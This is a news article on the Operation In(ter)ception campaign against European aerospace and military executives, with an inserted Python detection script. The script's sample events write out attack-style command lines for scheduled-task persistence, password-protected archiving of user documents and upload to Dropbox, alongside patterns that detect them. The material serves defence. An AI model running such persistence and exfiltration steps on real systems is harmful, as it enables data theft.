Attackers leveraged LinkedIn and posed as recruiters in order to steal information and money from European military and aerospace executives.
According to new research from ESET, the technique involved threat actors contacting the executives via LinkedIn while posing as recruiters. Named Operation In(ter)ception, the campaign ran from September to December 2019 and began with what ESET called “a quite believable job offer, seemingly from a well-known company in a relevant sector”, delivered as a OneDrive link to a PDF document with salary information for the fake position.
However, ESET malware researcher Dominik Breitenbacher said malware was silently deployed on the victim’s computer giving the attacker “an initial foothold and reached a solid persistence on the system.”
Among the tools the attackers utilized was custom multistage malware that often came disguised as legitimate software, and modified versions of open-source tools.
Speaking at ESET’s Virtual World conference this week, ESET’s head of threat research, Jean-Ian Boutin, said the job offer was often “too good to be true”, and while the conversation would start out friendly, the attacker would pressure the executive to answer questions more and more rapidly. The attacker would also ask what system the executive was using in order to determine its configuration.
Boutin said the PDF file was a decoy, listing positions with expected salaries. Meanwhile, the executable creates a scheduled task on the victim’s computer, using built-in Windows functionality, so that the payload is launched automatically. “This can be very useful in an enterprise set up, but is also a common technique used by threat groups to ensure their malicious payload is run periodically once it is installed,” he said.
He explained that the malicious payload in the scheduled task is used by the attacker to connect to an external server “and is able to download and execute arbitrary content.”
Post-attack, Boutin said all of the exfiltrated data was placed in password-protected RAR archives, and uploaded to Dropbox using a command line tool. “What made this threat actor difficult to track was that their operators were really careful and cleaned up their traces when moving from one system to another,” he said. The attackers also removed the LinkedIn profiles once the compromise was successful.
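The chain described above (scheduled task persistence from a user-writable path, password-protected RAR staging, command-line upload to Dropbox) can be turned into a simple host-based correlation rule. The script below is an added illustration, not ESET’s or Infosecurity’s code; the process-creation events are constructed samples, and the uploader name `dbxcli.exe` is an assumed stand-in for whatever command-line tool the actor used.

```python
import re

# Constructed sample process-creation events as (host, command line).
# They imitate the behaviour described in the article; they are not real telemetry.
SAMPLE_EVENTS = [
    ("WS01", r'schtasks.exe /create /sc minute /mo 15 /tn "Updater" /tr "C:\Users\exec\AppData\Local\Temp\upd.exe"'),
    ("WS01", r'C:\Users\exec\AppData\Local\Temp\upd.exe'),
    ("WS01", r'rar.exe a -hpSecret123 C:\Users\exec\AppData\Local\Temp\out.rar C:\Users\exec\Documents'),
    ("WS01", r'dbxcli.exe put C:\Users\exec\AppData\Local\Temp\out.rar /backup/out.rar'),  # assumed uploader name
    ("WS02", r'schtasks.exe /create /sc daily /tn "Backup" /tr "C:\Program Files\Backup\backup.exe"'),
    ("WS02", r'rar.exe a C:\Backups\docs.rar C:\Users\alice\Documents'),
]

# Directories an ordinary user can write to; a task action living there is suspicious.
USER_WRITABLE = re.compile(r'(?i)\\(users|programdata|temp)\\')
STAGES = {"task_from_user_path", "password_archive", "cloud_upload"}


def classify(cmdline):
    """Return a stage tag for one command line, or None if it looks benign."""
    low = cmdline.lower()
    if low.startswith("schtasks") and "/create" in low:
        # Extract the task action (/tr) and check where the binary lives.
        m = re.search(r'(?i)/tr\s+"?([^"]+)', cmdline)
        if m and USER_WRITABLE.search(m.group(1)):
            return "task_from_user_path"
    elif re.match(r'(winrar|rar)\.exe', low) and " a " in low and re.search(r' -h?p\S', low):
        # "a" adds files; -p / -hp set a password (-hp also encrypts headers).
        return "password_archive"
    elif "dropbox" in low or "dbxcli" in low:
        return "cloud_upload"
    return None


def find_chains(events):
    """Group stage tags per host; a host showing all three stages is flagged."""
    per_host = {}
    for host, cmd in events:
        tag = classify(cmd)
        if tag:
            per_host.setdefault(host, set()).add(tag)
    return {h: sorted(t) for h, t in per_host.items() if t == STAGES}


if __name__ == "__main__":
    for host, stages in find_chains(SAMPLE_EVENTS).items():
        print(f"{host}: full staging chain observed -> {stages}")
```

On the sample data only WS01 is flagged; WS02’s scheduled task points into Program Files and its archive has no password, so neither counts as a stage.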
During the research, ESET also identified some similarities with activity by the Lazarus group, which has been linked to the Sony Pictures attack and the WannaCry outbreak. While ESET said there was not enough information to definitively attribute these attacks to the Lazarus group, there were some similarities in the code and tactics used.
In a comment sent to Infosecurity, Paul Rockwell, head of trust and safety at LinkedIn, said: “We actively seek out signs of state-sponsored activity on the platform and quickly take action against bad actors in order to protect our members. We don’t wait on requests, our threat intelligence team removes fake accounts using information we uncover and intelligence from a variety of sources, including government agencies.
“Our teams utilize a variety of automated technologies, combined with a trained team of reviewers and member reporting, to keep our members safe from all types of bad actors. We enforce our policies, which are very clear: the creation of a fake account or fraudulent activity with an intent to mislead or lie to our members is a violation of our terms of service.
“In this case, we uncovered instances of abuse that involved the creation of fake accounts. We took immediate action at that time and permanently restricted the accounts.”